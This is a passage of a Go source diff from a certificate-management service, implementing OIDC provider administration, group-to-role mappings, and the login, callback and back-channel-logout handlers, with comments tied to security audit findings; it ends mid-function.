// CreateProvider handles POST /api/v1/auth/oidc/providers.
|
||||||
|
func (h *AuthSessionOIDCHandler) CreateProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var req oidcProviderRequest
|
||||||
|
if derr := json.NewDecoder(r.Body).Decode(&req); derr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "invalid JSON body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if strings.TrimSpace(req.ClientSecret) == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "client_secret is required")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
encrypted, eerr := h.encryptClientSecret([]byte(req.ClientSecret))
|
||||||
|
if eerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not encrypt client secret")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
prov := &oidcdomain.OIDCProvider{
|
||||||
|
ID: "op-" + randomB64URLForHandler(16),
|
||||||
|
TenantID: h.tenantID,
|
||||||
|
Name: req.Name,
|
||||||
|
IssuerURL: req.IssuerURL,
|
||||||
|
ClientID: req.ClientID,
|
||||||
|
ClientSecretEncrypted: encrypted,
|
||||||
|
RedirectURI: req.RedirectURI,
|
||||||
|
GroupsClaimPath: defaultIfBlank(req.GroupsClaimPath, oidcdomain.DefaultGroupsClaimPath),
|
||||||
|
GroupsClaimFormat: defaultIfBlank(req.GroupsClaimFormat, oidcdomain.GroupsClaimFormatStringArray),
|
||||||
|
FetchUserinfo: req.FetchUserinfo,
|
||||||
|
Scopes: req.Scopes,
|
||||||
|
AllowedEmailDomains: req.AllowedEmailDomains,
|
||||||
|
IATWindowSeconds: defaultIntIfZero(req.IATWindowSeconds, oidcdomain.DefaultIATWindowSeconds),
|
||||||
|
JWKSCacheTTLSeconds: defaultIntIfZero(req.JWKSCacheTTLSeconds, oidcdomain.DefaultJWKSCacheTTLSeconds),
|
||||||
|
}
|
||||||
|
if verr := prov.Validate(); verr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, verr.Error())
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if cerr := h.providerRepo.Create(r.Context(), prov); cerr != nil {
|
||||||
|
if errors.Is(cerr, repository.ErrOIDCProviderDuplicateName) {
|
||||||
|
Error(w, http.StatusConflict, "provider name already exists")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not create provider")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_created", caller.ActorID, caller.ActorType, prov.ID,
|
||||||
|
map[string]interface{}{"provider_id": prov.ID, "name": prov.Name, "issuer_url": prov.IssuerURL})
|
||||||
|
writeJSON(w, http.StatusCreated, providerToResponse(prov))
|
||||||
|
}
|
||||||
|
|
||||||
|
// UpdateProvider handles PUT /api/v1/auth/oidc/providers/{id}.
|
||||||
|
func (h *AuthSessionOIDCHandler) UpdateProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
id := r.PathValue("id")
|
||||||
|
if id == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing provider id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
existing, gerr := h.providerRepo.Get(r.Context(), id)
|
||||||
|
if gerr != nil {
|
||||||
|
if errors.Is(gerr, repository.ErrOIDCProviderNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "provider not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not load provider")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var req oidcProviderRequest
|
||||||
|
if derr := json.NewDecoder(r.Body).Decode(&req); derr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "invalid JSON body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Mutable fields only (id / tenant_id / created_at preserved).
|
||||||
|
existing.Name = req.Name
|
||||||
|
existing.IssuerURL = req.IssuerURL
|
||||||
|
existing.ClientID = req.ClientID
|
||||||
|
existing.RedirectURI = req.RedirectURI
|
||||||
|
existing.GroupsClaimPath = defaultIfBlank(req.GroupsClaimPath, existing.GroupsClaimPath)
|
||||||
|
existing.GroupsClaimFormat = defaultIfBlank(req.GroupsClaimFormat, existing.GroupsClaimFormat)
|
||||||
|
existing.FetchUserinfo = req.FetchUserinfo
|
||||||
|
existing.Scopes = req.Scopes
|
||||||
|
existing.AllowedEmailDomains = req.AllowedEmailDomains
|
||||||
|
if req.IATWindowSeconds != 0 {
|
||||||
|
existing.IATWindowSeconds = req.IATWindowSeconds
|
||||||
|
}
|
||||||
|
if req.JWKSCacheTTLSeconds != 0 {
|
||||||
|
existing.JWKSCacheTTLSeconds = req.JWKSCacheTTLSeconds
|
||||||
|
}
|
||||||
|
// Re-encrypt client_secret only if a new one is supplied; empty
|
||||||
|
// preserves the existing ciphertext.
|
||||||
|
if strings.TrimSpace(req.ClientSecret) != "" {
|
||||||
|
encrypted, eerr := h.encryptClientSecret([]byte(req.ClientSecret))
|
||||||
|
if eerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not encrypt client secret")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
existing.ClientSecretEncrypted = encrypted
|
||||||
|
}
|
||||||
|
if verr := existing.Validate(); verr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, verr.Error())
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if uerr := h.providerRepo.Update(r.Context(), existing); uerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not update provider")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_updated", caller.ActorID, caller.ActorType, existing.ID,
|
||||||
|
map[string]interface{}{"provider_id": existing.ID, "name": existing.Name})
|
||||||
|
writeJSON(w, http.StatusOK, providerToResponse(existing))
|
||||||
|
}
|
||||||
|
|
||||||
|
// DeleteProvider handles DELETE /api/v1/auth/oidc/providers/{id}.
|
||||||
|
// Refused when at least one user has authenticated via this provider.
|
||||||
|
func (h *AuthSessionOIDCHandler) DeleteProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
id := r.PathValue("id")
|
||||||
|
if id == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing provider id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if derr := h.providerRepo.Delete(r.Context(), id); derr != nil {
|
||||||
|
switch {
|
||||||
|
case errors.Is(derr, repository.ErrOIDCProviderNotFound):
|
||||||
|
Error(w, http.StatusNotFound, "provider not found")
|
||||||
|
case errors.Is(derr, repository.ErrOIDCProviderInUse):
|
||||||
|
Error(w, http.StatusConflict, "provider has authenticated users; revoke all sessions before delete")
|
||||||
|
default:
|
||||||
|
Error(w, http.StatusInternalServerError, "could not delete provider")
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_deleted", caller.ActorID, caller.ActorType, id,
|
||||||
|
map[string]interface{}{"provider_id": id})
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestProvider handles POST /api/v1/auth/oidc/test.
|
||||||
|
//
|
||||||
|
// Audit 2026-05-10 MED-5 closure. Dry-run validator for an OIDC
|
||||||
|
// provider config: runs OIDC discovery, the alg-downgrade defense,
|
||||||
|
// the RFC 9207 iss-parameter detection, and a JWKS fetch — without
|
||||||
|
// persisting anything. Body: `{issuer_url, client_id, scopes}`
|
||||||
|
// (client_secret accepted but ignored — discovery + JWKS don't
|
||||||
|
// require it). Response: TestDiscoveryResult; HTTP 200 even when
|
||||||
|
// individual checks fail (the response Errors field carries them so
|
||||||
|
// the GUI can render per-check status rows).
|
||||||
|
//
|
||||||
|
// Permission gate: `auth.oidc.create` (the operator is dry-running a
|
||||||
|
// provider they're about to create; the lookup endpoints have their
|
||||||
|
// own .list gate so this can't be used as a roundabout reconnaissance
|
||||||
|
// vector beyond what those already permit).
|
||||||
|
func (h *AuthSessionOIDCHandler) TestProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var req struct {
|
||||||
|
IssuerURL string `json:"issuer_url"`
|
||||||
|
ClientID string `json:"client_id"`
|
||||||
|
ClientSecret string `json:"client_secret"`
|
||||||
|
Scopes []string `json:"scopes"`
|
||||||
|
}
|
||||||
|
if derr := json.NewDecoder(r.Body).Decode(&req); derr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "invalid JSON body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if strings.TrimSpace(req.IssuerURL) == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "issuer_url is required")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Type-assert to the concrete service so we can reach the
|
||||||
|
// TestDiscovery method. The OIDCAuthHandshaker interface is
|
||||||
|
// intentionally narrow; rather than widening it (which would force
|
||||||
|
// every test stub to implement TestDiscovery) we accept the
|
||||||
|
// concrete reference for this single endpoint. Production code
|
||||||
|
// always supplies *oidcsvc.Service.
|
||||||
|
type discoveryTester interface {
|
||||||
|
TestDiscovery(ctx context.Context, issuerURL string) (*oidcsvc.TestDiscoveryResult, error)
|
||||||
|
}
|
||||||
|
tester, ok := h.oidcSvc.(discoveryTester)
|
||||||
|
if !ok {
|
||||||
|
Error(w, http.StatusInternalServerError, "OIDC service does not support discovery test")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
res, terr := tester.TestDiscovery(r.Context(), strings.TrimSpace(req.IssuerURL))
|
||||||
|
if terr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "discovery test execution failed")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_tested", caller.ActorID, caller.ActorType, "",
|
||||||
|
map[string]interface{}{
|
||||||
|
"issuer_url": req.IssuerURL,
|
||||||
|
"discovery_succeeded": res.DiscoverySucceeded,
|
||||||
|
"jwks_reachable": res.JWKSReachable,
|
||||||
|
"iss_param_supported": res.IssParamSupported,
|
||||||
|
"error_count": len(res.Errors),
|
||||||
|
})
|
||||||
|
writeJSON(w, http.StatusOK, res)
|
||||||
|
}
|
||||||
|
|
||||||
|
// RefreshProvider handles POST /api/v1/auth/oidc/providers/{id}/refresh.
|
||||||
|
// Forces re-fetch of the IdP discovery doc + JWKS, re-runs the IdP
|
||||||
|
// downgrade-attack defense.
|
||||||
|
func (h *AuthSessionOIDCHandler) RefreshProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
id := r.PathValue("id")
|
||||||
|
if id == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing provider id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if rerr := h.oidcSvc.RefreshKeys(r.Context(), id); rerr != nil {
|
||||||
|
if errors.Is(rerr, repository.ErrOIDCProviderNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "provider not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusBadRequest, "refresh failed: "+rerr.Error())
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_refreshed", caller.ActorID, caller.ActorType, id,
|
||||||
|
map[string]interface{}{"provider_id": id})
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"refreshed": true})
|
||||||
|
}
|
||||||
|
|
||||||
|
// groupMappingResponse is the JSON projection of a group-to-role
// mapping. CreatedAt is a string that mappingToResponse formats as
// RFC 3339 in UTC.
type groupMappingResponse struct {
	ID         string `json:"id"`
	ProviderID string `json:"provider_id"`
	GroupName  string `json:"group_name"`
	RoleID     string `json:"role_id"`
	TenantID   string `json:"tenant_id"`
	CreatedAt  string `json:"created_at"`
}
|
||||||
|
|
||||||
|
func mappingToResponse(m *oidcdomain.GroupRoleMapping) groupMappingResponse {
|
||||||
|
return groupMappingResponse{
|
||||||
|
ID: m.ID, ProviderID: m.ProviderID, GroupName: m.GroupName,
|
||||||
|
RoleID: m.RoleID, TenantID: m.TenantID,
|
||||||
|
CreatedAt: m.CreatedAt.UTC().Format(time.RFC3339),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// groupMappingRequest is the JSON body decoded by AddGroupMapping.
type groupMappingRequest struct {
	// ProviderID names the OIDC provider the new mapping is for.
	ProviderID string `json:"provider_id"`
	// GroupName is the group name to map.
	GroupName string `json:"group_name"`
	// RoleID is the role to associate with GroupName.
	RoleID string `json:"role_id"`
}
|
||||||
|
|
||||||
|
// ListGroupMappings handles GET /api/v1/auth/oidc/group-mappings?provider_id=<id>.
|
||||||
|
func (h *AuthSessionOIDCHandler) ListGroupMappings(w http.ResponseWriter, r *http.Request) {
|
||||||
|
if _, err := callerFromRequest(r); err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
providerID := strings.TrimSpace(r.URL.Query().Get("provider_id"))
|
||||||
|
if providerID == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing required query parameter `provider_id`")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
mappings, lerr := h.mappingRepo.ListByProvider(r.Context(), providerID)
|
||||||
|
if lerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not list mappings")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
out := make([]groupMappingResponse, 0, len(mappings))
|
||||||
|
for _, m := range mappings {
|
||||||
|
out = append(out, mappingToResponse(m))
|
||||||
|
}
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"mappings": out})
|
||||||
|
}
|
||||||
|
|
||||||
|
// AddGroupMapping handles POST /api/v1/auth/oidc/group-mappings.
|
||||||
|
func (h *AuthSessionOIDCHandler) AddGroupMapping(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var req groupMappingRequest
|
||||||
|
if derr := json.NewDecoder(r.Body).Decode(&req); derr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "invalid JSON body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
mapping := &oidcdomain.GroupRoleMapping{
|
||||||
|
ID: "grm-" + randomB64URLForHandler(16),
|
||||||
|
ProviderID: req.ProviderID,
|
||||||
|
GroupName: req.GroupName,
|
||||||
|
RoleID: req.RoleID,
|
||||||
|
TenantID: h.tenantID,
|
||||||
|
}
|
||||||
|
if verr := mapping.Validate(); verr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, verr.Error())
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if aerr := h.mappingRepo.Add(r.Context(), mapping); aerr != nil {
|
||||||
|
if errors.Is(aerr, repository.ErrGroupRoleMappingDuplicate) {
|
||||||
|
Error(w, http.StatusConflict, "mapping already exists")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not add mapping")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.group_mapping_added", caller.ActorID, caller.ActorType, mapping.ID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"mapping_id": mapping.ID, "provider_id": mapping.ProviderID,
|
||||||
|
"group_name": mapping.GroupName, "role_id": mapping.RoleID,
|
||||||
|
})
|
||||||
|
writeJSON(w, http.StatusCreated, mappingToResponse(mapping))
|
||||||
|
}
|
||||||
|
|
||||||
|
// RemoveGroupMapping handles DELETE /api/v1/auth/oidc/group-mappings/{id}.
|
||||||
|
func (h *AuthSessionOIDCHandler) RemoveGroupMapping(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
id := r.PathValue("id")
|
||||||
|
if id == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing mapping id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if rerr := h.mappingRepo.Remove(r.Context(), id); rerr != nil {
|
||||||
|
if errors.Is(rerr, repository.ErrGroupRoleMappingNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "mapping not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not remove mapping")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.group_mapping_removed", caller.ActorID, caller.ActorType, id,
|
||||||
|
map[string]interface{}{"mapping_id": id})
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
}
|
||||||
@@ -0,0 +1,390 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"errors"
|
||||||
|
"net/http"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
||||||
|
sessionsvc "github.com/certctl-io/certctl/internal/auth/session"
|
||||||
|
sessiondomain "github.com/certctl-io/certctl/internal/auth/session/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 11 (2026-05-14): extracted from
|
||||||
|
// internal/api/handler/auth_session_oidc.go via the Option B
|
||||||
|
// sibling-file pattern. Package stays `handler`; every external
|
||||||
|
// caller of `handler.AuthSessionOIDCHandler.{LoginInitiate,
|
||||||
|
// LoginCallback, BackChannelLogout, Logout}` resolves the same
|
||||||
|
// way — pure mechanical relocation. The router wiring in
|
||||||
|
// internal/api/router/router.go is unaffected.
|
||||||
|
//
|
||||||
|
// This file holds Section 1 of the original file's three-section
|
||||||
|
// layout (per its own package doc-comment): the PUBLIC OIDC
|
||||||
|
// HANDSHAKE handlers. These four endpoints are auth-exempt — they
|
||||||
|
// run before the caller has a certctl-issued credential:
|
||||||
|
//
|
||||||
|
// GET /auth/oidc/login?provider=<id> -> 302 to IdP
|
||||||
|
// GET /auth/oidc/callback?code=...&state=... -> consume + mint
|
||||||
|
// POST /auth/oidc/back-channel-logout -> IdP-initiated
|
||||||
|
// POST /auth/logout -> revoke caller's
|
||||||
|
//
|
||||||
|
// Helpers (h.clearPreLoginCookie / h.clearSessionCookies /
|
||||||
|
// h.recordAudit / clientIPFromRequest / classifyOIDCFailure) stay
|
||||||
|
// in auth_session_oidc.go alongside the AuthSessionOIDCHandler
|
||||||
|
// struct + constructor — same-package resolution makes the calls
|
||||||
|
// reach across the file boundary at zero compile-time cost.
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// 1. Public OIDC handshake handlers.
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
// LoginInitiate handles GET /auth/oidc/login?provider=<id>.
|
||||||
|
//
|
||||||
|
// Generates state + nonce + PKCE-S256 verifier (in OIDCService),
|
||||||
|
// persists the pre-login row, sets the certctl_oidc_pending cookie,
|
||||||
|
// 302-redirects to the IdP authorization URL.
|
||||||
|
func (h *AuthSessionOIDCHandler) LoginInitiate(w http.ResponseWriter, r *http.Request) {
|
||||||
|
providerID := strings.TrimSpace(r.URL.Query().Get("provider"))
|
||||||
|
if providerID == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing required query parameter `provider`")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Audit 2026-05-10 MED-16 — capture clientIP + UA at /auth/oidc/login
|
||||||
|
// so HandleCallback can reject a stolen pre-login cookie replayed
|
||||||
|
// from a different browser/source. clientIPFromRequest already
|
||||||
|
// honours the LOW-5 trusted-proxy gating; r.UserAgent() reads the
|
||||||
|
// header verbatim.
|
||||||
|
loginIP := clientIPFromRequest(r)
|
||||||
|
loginUA := r.UserAgent()
|
||||||
|
authURL, cookieValue, _, err := h.oidcSvc.HandleAuthRequest(r.Context(), providerID, loginIP, loginUA)
|
||||||
|
if err != nil {
|
||||||
|
// Provider not found is the most common case; map to 404.
|
||||||
|
if errors.Is(err, repository.ErrOIDCProviderNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "provider not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Other errors (disco fetch failure / IdP downgrade defense /
|
||||||
|
// crypto failure) are server-side; surface as 500 without
|
||||||
|
// leaking details.
|
||||||
|
Error(w, http.StatusInternalServerError, "could not initiate OIDC login")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
http.SetCookie(w, &http.Cookie{
|
||||||
|
Name: sessiondomain.PreLoginCookieName,
|
||||||
|
Value: cookieValue,
|
||||||
|
// Audit 2026-05-10 MED-14 — `__Host-` prefix requires Path=/.
|
||||||
|
// The cookie lives 10 minutes and is only ever consumed by the
|
||||||
|
// callback handler; the wider path scope is harmless.
|
||||||
|
Path: "/",
|
||||||
|
MaxAge: int((10 * time.Minute).Seconds()),
|
||||||
|
Secure: h.cookieAttrs.Secure,
|
||||||
|
HttpOnly: true,
|
||||||
|
// Pre-login cookie MUST be SameSite=Lax (cannot be Strict
|
||||||
|
// because the IdP-initiated callback is a top-level navigation
|
||||||
|
// from a different origin per Phase 5 spec).
|
||||||
|
SameSite: http.SameSiteLaxMode,
|
||||||
|
})
|
||||||
|
http.Redirect(w, r, authURL, http.StatusFound)
|
||||||
|
}
|
||||||
|
|
||||||
|
// LoginCallback handles GET /auth/oidc/callback?code=...&state=....
|
||||||
|
//
|
||||||
|
// Reads the certctl_oidc_pending cookie, drives OIDCService.HandleCallback
|
||||||
|
// (which parses + HMAC-verifies the cookie, runs the 11-step token
|
||||||
|
// validation, group-claim resolution, role-mapping, user-upsert),
|
||||||
|
// mints a post-login session via SessionService.Create, deletes the
|
||||||
|
// pre-login cookie, sets the post-login cookie + CSRF token cookie,
|
||||||
|
// and 302's to the dashboard.
|
||||||
|
func (h *AuthSessionOIDCHandler) LoginCallback(w http.ResponseWriter, r *http.Request) {
|
||||||
|
q := r.URL.Query()
|
||||||
|
code := strings.TrimSpace(q.Get("code"))
|
||||||
|
state := strings.TrimSpace(q.Get("state"))
|
||||||
|
// Audit 2026-05-10 MED-17 — RFC 9207 iss URL parameter. NOT
|
||||||
|
// trimmed; preserved exactly as sent so the service-layer compare
|
||||||
|
// against the matched provider's IssuerURL is byte-strict. The IdP
|
||||||
|
// emits this only when advertised in its discovery doc; the
|
||||||
|
// service-layer check is a no-op otherwise.
|
||||||
|
callbackIss := q.Get("iss")
|
||||||
|
if code == "" || state == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing code or state query parameter")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
preLoginCookie, err := r.Cookie(sessiondomain.PreLoginCookieName)
|
||||||
|
if err != nil || preLoginCookie.Value == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing pre-login cookie")
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_login_failed", "anonymous", domain.ActorTypeSystem, "",
|
||||||
|
map[string]interface{}{"failure_category": "missing_pre_login_cookie"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
clientIP := clientIPFromRequest(r)
|
||||||
|
userAgent := r.UserAgent()
|
||||||
|
|
||||||
|
res, err := h.oidcSvc.HandleCallback(r.Context(), preLoginCookie.Value, code, state, callbackIss, clientIP, userAgent)
|
||||||
|
if err != nil {
|
||||||
|
// Audit 2026-05-10 HIGH-7 — instead of a blank 400, redirect
|
||||||
|
// to /login?error=oidc_failed&reason=<category>. The LoginPage
|
||||||
|
// reads the query params and renders an operator-friendly
|
||||||
|
// alert. The audit row still carries the specific
|
||||||
|
// failure_category so server-side observability is unchanged.
|
||||||
|
category := classifyOIDCFailure(err)
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_login_failed", "anonymous", domain.ActorTypeSystem, "",
|
||||||
|
map[string]interface{}{"failure_category": category})
|
||||||
|
// Special-case unmapped groups so the audit row name distinguishes
|
||||||
|
// it from generic failures (operator-policy decision).
|
||||||
|
if category == "unmapped_groups" {
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_login_unmapped_groups", "anonymous", domain.ActorTypeSystem, "",
|
||||||
|
map[string]interface{}{})
|
||||||
|
}
|
||||||
|
// Always clear the pre-login cookie on failure.
|
||||||
|
h.clearPreLoginCookie(w)
|
||||||
|
// 302 to the login page; the reason categorizes the failure for
|
||||||
|
// the GUI to render. Keep the redirect target relative — the
|
||||||
|
// SPA serves /login.
|
||||||
|
http.Redirect(w, r, "/login?error=oidc_failed&reason="+category, http.StatusFound)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// res from the OIDC service already carries cookieValue + CSRFToken
|
||||||
|
// (the OIDC service wraps SessionService internally per Phase 3).
|
||||||
|
// We re-emit them via the standard Set-Cookie helper here so cookie
|
||||||
|
// attributes stay handler-controlled.
|
||||||
|
now := time.Now().UTC()
|
||||||
|
expires := now.Add(8 * time.Hour) // matches default SessionConfig.AbsoluteTimeout
|
||||||
|
http.SetCookie(w, &http.Cookie{
|
||||||
|
Name: sessiondomain.PostLoginCookieName,
|
||||||
|
Value: res.CookieValue,
|
||||||
|
Path: "/",
|
||||||
|
Expires: expires,
|
||||||
|
Secure: h.cookieAttrs.Secure,
|
||||||
|
HttpOnly: true,
|
||||||
|
SameSite: h.cookieAttrs.SameSite,
|
||||||
|
})
|
||||||
|
http.SetCookie(w, &http.Cookie{
|
||||||
|
Name: sessiondomain.CSRFCookieName,
|
||||||
|
Value: res.CSRFToken,
|
||||||
|
Path: "/",
|
||||||
|
Expires: expires,
|
||||||
|
Secure: h.cookieAttrs.Secure,
|
||||||
|
HttpOnly: false, // intentional — GUI must read this to echo header
|
||||||
|
SameSite: h.cookieAttrs.SameSite,
|
||||||
|
})
|
||||||
|
h.clearPreLoginCookie(w)
|
||||||
|
|
||||||
|
userID := ""
|
||||||
|
if res.User != nil {
|
||||||
|
userID = res.User.ID
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_login_succeeded", userID, domain.ActorTypeUser, userID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"user_id": userID,
|
||||||
|
"role_ids": res.RoleIDs,
|
||||||
|
})
|
||||||
|
h.recordAudit(r.Context(), "auth.session_created", userID, domain.ActorTypeUser, userID,
|
||||||
|
map[string]interface{}{"user_id": userID})
|
||||||
|
|
||||||
|
http.Redirect(w, r, h.postLoginURL, http.StatusFound)
|
||||||
|
}
|
||||||
|
|
||||||
|
// BackChannelLogout handles POST /auth/oidc/back-channel-logout.
|
||||||
|
//
|
||||||
|
// OpenID Connect Back-Channel Logout 1.0. The IdP POSTs a logout_token
|
||||||
|
// JWT in the body (form-encoded `logout_token=<jwt>`); certctl validates
|
||||||
|
// signature against the IdP's JWKS, validates required claims (iss, aud,
|
||||||
|
// iat, jti, events; exactly one of sub or sid; nonce ABSENT), revokes
|
||||||
|
// matching sessions, returns 200 with Cache-Control: no-store. Failure
|
||||||
|
// modes return 400 per spec §2.6.
|
||||||
|
func (h *AuthSessionOIDCHandler) BackChannelLogout(w http.ResponseWriter, r *http.Request) {
|
||||||
|
if err := r.ParseForm(); err != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "could not parse form body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
logoutToken := strings.TrimSpace(r.FormValue("logout_token"))
|
||||||
|
if logoutToken == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing logout_token in form body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
issuer, sub, sid, jti, _, err := h.bclVerifier.Verify(r.Context(), logoutToken)
|
||||||
|
if err != nil {
|
||||||
|
// Per spec §2.6 — uniform 400 on any validation failure. The
|
||||||
|
// audit row carries the specific reason; the wire stays uniform.
|
||||||
|
// iat-skew rejections (Audit 2026-05-10 HIGH-3 iat-window check)
|
||||||
|
// land here too — the reason string distinguishes them.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout_failed", "anonymous", domain.ActorTypeSystem, "",
|
||||||
|
map[string]interface{}{"failure_reason": err.Error()})
|
||||||
|
Error(w, http.StatusBadRequest, "logout_token validation failed")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Audit 2026-05-10 HIGH-3 — jti consumed-set. Atomic single-use
|
||||||
|
// semantics via the postgres ON CONFLICT DO NOTHING path. On
|
||||||
|
// replay return 200 + audit outcome=jti_replayed (RFC 9700 §2.7).
|
||||||
|
// On transient repo error return 503 so the IdP follows its retry
|
||||||
|
// semantics. When the consumer is nil (test path / pre-fix
|
||||||
|
// deployments) the consume step is skipped.
|
||||||
|
if h.bclReplay != nil && jti != "" {
|
||||||
|
ttl := h.bclMaxAge * 2
|
||||||
|
if ttl < 24*time.Hour {
|
||||||
|
ttl = 24 * time.Hour
|
||||||
|
}
|
||||||
|
if cerr := h.bclReplay.ConsumeJTI(r.Context(), jti, issuer, ttl); cerr != nil {
|
||||||
|
